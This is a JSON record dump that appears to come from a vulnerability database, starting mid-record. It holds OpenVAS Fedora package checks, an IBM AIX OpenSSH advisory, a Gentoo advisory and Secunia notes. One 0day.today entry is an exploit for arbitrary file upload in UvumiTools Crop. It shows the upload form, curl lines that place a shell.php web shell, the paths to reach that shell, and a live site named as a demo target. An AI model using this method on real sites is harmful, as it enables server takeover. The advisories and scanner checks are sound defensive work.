(flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:07", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-02-15T00:00:00", "id": "OPENVAS:1361412562310874121", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874121", "title": "Fedora Update for mujs FEDORA-2018-5b2e981f14", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_5b2e981f14_mujs_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for mujs FEDORA-2018-5b2e981f14\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874121\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-15 08:50:18 +0100 (Thu, 15 Feb 2018)\");\n script_cve_id(\"CVE-2018-5759\", \"CVE-2018-6191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mujs FEDORA-2018-5b2e981f14\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mujs'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mujs on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-5b2e981f14\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FLDFOXVGLVSJOYM5J3HZKGJ24UFJKZZH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"mujs-0\", rpm:\"mujs-0~11.20180129git25821e6.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:33:05", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-02-15T00:00:00", "id": "OPENVAS:1361412562310874113", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874113", "title": "Fedora Update for mujs FEDORA-2018-d4746c772f", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d4746c772f_mujs_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for mujs FEDORA-2018-d4746c772f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874113\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-15 08:49:24 +0100 (Thu, 15 Feb 2018)\");\n script_cve_id(\"CVE-2018-5759\", \"CVE-2018-6191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mujs FEDORA-2018-d4746c772f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mujs'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mujs on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d4746c772f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TYVDMPTTSQY7X6C3ZA4AJ2ECKACU4U6U\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"mujs-0\", rpm:\"mujs-0~11.20180129git25821e6.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "aix": [{"lastseen": "2019-05-29T19:19:14", "bulletinFamily": "unix", "description": "IBM SECURITY ADVISORY\n\nFirst Issued:Sun Feb 5 23:36:10 CST 2017 \n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2016-8858, \nCVE-2016-10009, CVE-2016-10011, CVE-2016-10012 )\n\n \n \n===============================================================================\n\nSUMMARY:\n\nVulnerabilities in OpenSSH affect AIX.\n \n \n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2016-8858\n DESCRIPTION: OpenSSH is vulnerable to a denial of service, caused by an\n error in the kex_input_kexinit() function. By sending specially crafted data\n during the key exchange process, a remote attacker could exploit this\n vulnerability to consume all available memory resources.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/118127 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2016-10009\n DESCRIPTION: OpenSSH could allow a remote authenticated attacker to execute\n arbitrary code on the system, caused by the loading of a specially crafted\n PKCS#11 module across a forwarded agent channel. An attacker could exploit \n this vulnerability to write files or execute arbitrary code on the system.\n CVSS Base Score: 6.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119828 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n \n CVEID: CVE-2016-10011\n DESCRIPTION:OpenSSH could allow a local authenticated attacker to obtain\n sensitive information, caused by a privilege separation flaw. An attacker \n could exploit this vulnerability to obtain host private key material and \n other sensitive information.\n CVSS Base Score: 5.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119830 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\n CVEID: CVE-2016-10012\n DESCRIPTION:OpenSSH could allow a local attacker to gain elevated privileges\n on the system, caused by improper bounds checking in the shared memory\n manager. An attacker could exploit this vulnerability to gain elevated \n privileges on the system.\n CVSS Base Score: 5.9\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119831 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n \n AFFECTED PRODUCTS AND VERSION:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n \n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n \n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 6.0.0.6203 key_w_fs\n openssh.base.server 4.0.0.5200 6.0.0.6203 key_w_fs\n \n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n \n REMEDIATION:\n\n A. FIXES\n\n\tFixes are available. The fixes can be downloaded via ftp and\n\thttp from:\n\n\tftp://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\thttp://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\thttps://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\n\tThe links above are to a tar file containing this signed advisory, interim\n\tfixes, and OpenSSL signatures for each interim fix.\n\tThese fixes below include prerequisite checking. This will enforce the correct\n\tmapping between the fixes and AIX releases.\n\n\tNote that the tar file contains Interim fixes that are based on\n\tOpenSSH version as given below. \n\n\tYou must be on the 'prereq for installation' level before applying the interim\n\tfix. This may require installing a new level(prereq version) first.\n \n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n ---------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 6203_ifix.170124.epkg.Z openssh.base(6.0.0.6203 version) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n ---------------------------------------------------------------------------------------------\n 2.2.* 6203_ifix.170124.epkg.Z openssh.base(6.0.0.6203 version) key_w_fix\n\n\n\tLatest level of OpenSSH fileset is available from the web download site:\n\thttps://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssh&cp=UTF-8\n\n \n\tTo extract the fix from the tar file:\n\n\ttar xvf openssh_fix10.tar\n\tcd openssh_fix10\n\n\tVerify you have retrieved the fix intact:\n\n\tThe checksums below were generated using the\n\t\"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 771b1ce548ed725aae3e6b58960d62bfba6b4d77f48ed4b01b1bb1d6acece770 6203_ifix.170124.epkg.Z key_w_csum\n\n \n\tThese sums should match exactly. The OpenSSL signatures in the tar file and\n\ton this advisory can also be used to verify the integrity of the fixes. If \n the sums of the fixes. If the sums or signatures cannot be confirmed,\n\tcontact IBM AIX Security at security-alert@austin.ibm.com and describe\n\tthe discrepancy.\n \n\tPublished advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig \n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n \n\n \n B. FIX AND INTERIM FIX INSTALLATION\n\n After applying fix, IBM recommends that you regenerate your SSH keys as\n a precaution. \n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n \n None.\n \n \n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/118127\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119828\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119830\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119831\n CVE-2016-8858 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8858\n CVE-2016-10009: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10009\n CVE-2016-10011: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10011\n CVE-2016-10012: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10012\n \n\nACKNOWLEDGEMENTS:\n\n None\n \n \nCHANGE HISTORY:\n\n First Issued: Sun Feb 5 23:36:10 CST 2017\n\n\n===============================================================================\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n \n\n\n", "modified": "2017-02-05T23:36:10", "published": "2017-02-05T23:36:10", "id": "OPENSSH_ADVISORY10.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc", "title": "Vulnerabilities in OpenSSH affect AIX.", "type": "aix", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-12-07T12:54:24", "bulletinFamily": "unix", "description": "### Background\n\nOpenSSH is a complete SSH protocol implementation that includes SFTP client and server support. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nRemote attackers could cause Denial of Service and conduct user enumeration. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-7.3_p1-r7\"", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "href": "https://security.gentoo.org/glsa/201612-18", "id": "GLSA-201612-18", "type": "gentoo", "title": "OpenSSH: Multiple vulnerabilities", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-10T04:12:08", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-10-15T00:00:00", "published": "2012-10-15T00:00:00", "id": "1337DAY-ID-19555", "href": "https://0day.today/exploit/description/19555", "type": "zdt", "title": "UvumiTools Crop 2.0.0 - Arbitrary File Upload Vulnerability", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [x] Official Website: http://www.1337day.com 0\r\n1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n0 0\r\n1 ========================================== 1\r\n0 I'm Taurus Omar Member From Inj3ct0r TEAM 1\r\n1 ========================================== 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n| |\r\n| UvumiTools Crop 2.0.0 - Arbitrary File Upload Vulnerability | \r\n--------------------------------------------------------------------------\r\n\r\n+----------------| ABOUT ME |--------------------+\r\nNAME: TAURUS OMAR -\r\nHOME: ACCESOILEGAL.BLOGSPOT.COM -\r\nTWITTER: @taurusomar_ -\r\nE-MAIL: omar-taurus[at]dragonsecurity[dot]org -\r\nE-MAIL: omar-taurus[at]live[dot]com -\r\nPWNED: #ZUUU -\r\n+------------------------------------------------+ \r\n\r\n# Exploit Title: UvumiTools Crop 2.0.0 - Arbitrary File Upload Vulnerability \r\n# Vendor Name: UvumiTools\r\n# Url Vendor: http://uvumitools.com/\r\n# Category:: WebApps \r\n# Dork: N/A\r\n# 0day exploits : 1337day.com Inj3ct0r Exploit DataBase \r\n\r\n# Vulnerability Code\r\n\r\n<div>\r\n<form id=\"formula\" method=\"post\" enctype=\"multipart/form-data\" action=\"\">\r\n<input type=\"hidden\" name=\"accion\" value=\"subir\" />\r\n<input type=\"hidden\" name=\"uniqid\" value=\"\" />\r\n<input type=\"hidden\" name=\"carpeta\" value=\"\" />\r\n<input type=\"hidden\" name=\"id_padre\" value=\"0\" />\r\nSubir imagen: <input type=\"file\" id=\"imagen_file\" name=\"imagen\" /> \r\n<input type=\"button\" onclick=\"subir()\" value=\"Subir\" class=\"button\" />\r\n</form>\r\n<input id=\"imagen\" type=\"hidden\" value=\"\" />\r\n<input id=\"publico_top\" name=\"publico_top\" type=\"hidden\" />\r\n<input id=\"publico_left\" name=\"publico_left\" type=\"hidden\" />\r\n<input id=\"publico_width\" name=\"publico_width\" type=\"hidden\" />\r\n<input id=\"publico_height\" name=\"publico_height\" type=\"hidden\" />\r\n<input id=\"thumbnail_top\" name=\"thumbnail_top\" type=\"hidden\" />\r\n<input id=\"thumbnail_left\" name=\"thumbnail_left\" type=\"hidden\" />\r\n<input id=\"thumbnail_width\" name=\"thumbnail_width\" type=\"hidden\" />\r\n<input id=\"thumbnail_height\" name=\"thumbnail_height\" type=\"hidden\" />\r\n<hr style=\"margin-top:10px;\" />\r\n<input type=\"button\" value=\"Cancelar\" class=\"button\" onclick=\"parent.MochaUI.closeWindow(parent.$('winSubirImagen2'));\" />\r\n</div>\r\n\r\n# Input\r\n$ch = curl_init(\"http://site.com/admin/imagen/imagenes/shell.php\")\r\n\r\n# Output\r\n$ch = curl_init(\"http://site.com/admin/imagen/imagenes/muestra/shell.php\") or $ch = curl_init(\"http://site.com//old/images/shell.php\")\r\n\r\n# Access_Shell \r\nhttp://site.com/admin/imagen/imagenes/muestra/shell.php or http://site.com//old/images/shell.php\r\n\r\n\r\n# Simple_Demo\r\nhttp://www.provexfontecilla.cl/admin/marcas/imagen/\r\n\r\n\n\n# 0day.today [2018-03-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19555"}, {"lastseen": "2018-03-03T01:36:41", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-02-26T00:00:00", "published": "2009-02-26T00:00:00", "id": "1337DAY-ID-4891", "href": "https://0day.today/exploit/description/4891", "type": "zdt", "title": "Coppermine Photo Gallery <= 1.4.20 (IMG) Privilege Escalation Exploit", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4891"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "description": "Directory traversal in TFTP server.", "modified": "2008-04-03T00:00:00", "published": "2008-04-03T00:00:00", "id": "SECURITYVULNS:VULN:8858", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8858", "title": "LANDesk Management Suite directory traversal", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\r\n\r\n\r\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\r\nSicherheit:\r\nhttp://secunia.com/secunia_vacancies/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nUltimate PHP Board Cross-Site Scripting and Script Insertion\r\n\r\nSECUNIA ADVISORY ID:\r\nSA16144\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/16144/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nCross Site Scripting\r\n\r\nWHERE:\r\n&gt;From remote\r\n\r\nSOFTWARE:\r\nUltimate PHP Board &#40;UPB&#41; 1.x\r\nhttp://secunia.com/product/423/\r\n\r\nDESCRIPTION:\r\nrgod has discovered some vulnerabilities in Ultimate PHP Board, which\r\ncan be exploited by malicious people to conduct cross-site scripting\r\nand script insertion attacks.\r\n\r\n1&#41; Input passed to the &quot;css&quot; parameter in &quot;send.php&quot;, &quot;users.php&quot;,\r\n&quot;top.php&quot; and &quot;main.php&quot;, and the &quot;title&quot; parameter in &quot;header.php&quot;\r\nisn&#39;t properly sanitised before being returned to the user. This can\r\nbe exploited to execute arbitrary HTML and script code in a user&#39;s\r\nbrowser session in context of an affected site.\r\n\r\n2&#41; Input passed to the &quot;User-Agent&quot; HTTP header in &quot;index.php&quot; and\r\n&quot;register.php&quot; isn&#39;t properly sanitised before being logged. This can\r\nbe exploited to inject arbitrary HTML and script code, which will get\r\nexecuted in an administrator&#39;s browser session in context of an\r\naffected site when the malicious user data is viewed via the\r\n&quot;admin_iplog.php&quot; script.\r\n\r\nThis is related to:\r\nSA8858\r\n\r\nThe vulnerabilities have been confirmed on a fully patched UPB Gold\r\n1.9.6 installation. Other versions may also be affected.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly sanitised.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nrgod\r\n\r\nOTHER REFERENCES:\r\nSA8858:\r\nhttp://secunia.com/advisories/8858/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: &#40;Criticality, Where etc.&#41;\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-07-22T00:00:00", "published": "2005-07-22T00:00:00", "id": "SECURITYVULNS:DOC:9261", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9261", "title": "[SA16144] Ultimate PHP Board Cross-Site Scripting and Script Insertion", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}